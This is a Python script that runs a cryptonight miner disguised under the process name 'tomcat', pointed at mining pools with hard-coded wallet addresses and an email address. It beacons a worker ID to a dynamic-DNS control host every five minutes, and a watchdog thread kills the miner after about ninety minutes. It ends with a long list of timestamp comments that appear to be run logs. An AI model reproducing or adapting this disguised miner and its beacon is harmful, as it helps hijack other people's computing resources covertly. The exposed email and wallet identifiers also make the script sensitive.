import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:07.373902
#2018-02-17 17:03:01.662264
#2018-02-17 18:50:07.791447
#2018-02-17 20:38:05.359620
#2018-02-17 22:24:05.701077
#2018-02-18 00:08:05.034101
#2018-02-18 01:58:07.437380
#2018-02-18 03:47:01.518293
#2018-02-18 05:33:01.878739
#2018-02-18 07:26:05.235933
#2018-02-18 09:13:01.597591
#2018-02-18 10:59:04.850245
#2018-02-18 12:45:08.986822
#2018-02-18 14:32:07.365723
#2018-02-18 16:22:07.037121
#2018-02-18 18:12:01.970426
#2018-02-18 19:58:01.821985
#2018-02-18 21:45:04.288913
#2018-02-18 23:34:03.705620
#2018-02-19 01:20:01.712419
#2018-02-19 03:08:06.378748
#2018-02-19 04:54:01.277727
#2018-02-19 06:38:05.887197
#2018-02-19 08:28:08.345667
#2018-02-19 10:17:06.386661
#2018-02-19 12:05:07.425864
#2018-02-19 13:52:01.920806
#2018-02-19 15:40:01.687966
#2018-02-19 17:28:04.670112
#2018-02-19 19:15:08.487671
#2018-02-19 21:03:06.631487
#2018-02-19 22:50:03.031238
#2018-02-20 00:33:05.963441
#2018-02-20 02:22:06.231891
#2018-02-20 04:13:03.942352
#2018-02-20 05:56:04.956096
#2018-02-20 07:41:07.952526
#2018-02-20 09:27:08.181792
#2018-02-20 11:11:07.760363
#2018-02-20 12:58:07.052203
#2018-02-20 14:44:08.485953
#2018-02-20 16:29:08.628871
#2018-02-20 18:16:01.257052
#2018-02-20 20:08:01.602868
#2018-02-20 21:56:03.976489
#2018-02-20 23:36:07.644547
#2018-02-21 01:21:01.592298
#2018-02-21 03:09:05.031248
#2018-02-21 04:57:06.610756
#2018-02-21 06:43:08.165105
#2018-02-21 08:32:05.753265
#2018-02-21 10:17:07.173267
#2018-02-21 12:06:04.888719
#2018-02-21 13:56:07.186973
#2018-02-21 15:42:04.749813
#2018-02-21 17:33:10.322459
#2018-02-21 19:19:07.678519
#2018-02-21 21:07:06.158978
#2018-02-21 22:54:04.299691
#2018-02-22 00:42:07.255990
#2018-02-22 02:29:05.495664
#2018-02-22 04:16:04.965898
#2018-02-22 05:59:07.024947
#2018-02-22 07:46:06.070819
#2018-02-22 09:34:03.913702
#2018-02-22 11:20:10.147768
#2018-02-22 13:06:01.563662
#2018-02-22 14:53:05.986100
#2018-02-22 16:40:03.642247
#2018-02-22 18:25:11.724202
#2018-02-22 20:20:04.801217
#2018-02-22 22:05:07.564545
#2018-02-22 23:52:07.398605
#2018-02-23 01:43:01.332422
#2018-02-23 03:31:04.578257
#2018-02-23 05:16:08.225045
#2018-02-23 07:01:06.681180
#2018-02-23 08:51:05.952535
#2018-02-23 11:11:04.513990
#2018-02-23 13:06:10.570420
#2018-02-23 14:51:04.630277
#2018-02-23 16:39:05.678538
#2018-02-23 18:27:08.695360
#2018-02-23 20:13:05.233533
#2018-02-23 22:04:05.042927
#2018-02-23 23:53:06.476930
#2018-02-24 01:44:07.611334
#2018-02-24 03:36:01.941599
#2018-02-24 05:20:07.847980
#2018-02-24 07:08:07.975134
#2018-02-24 08:55:07.125027
#2018-02-24 10:56:06.955768
#2018-02-24 12:46:06.002335
#2018-02-24 14:35:01.694688
#2018-02-24 16:21:04.871099
#2018-02-24 18:15:05.763245
#2018-02-24 20:02:06.613188
#2018-02-24 21:45:06.147056
#2018-02-25 02:01:02.066238
#2018-02-25 05:55:03.864900
#2018-02-25 11:38:07.740810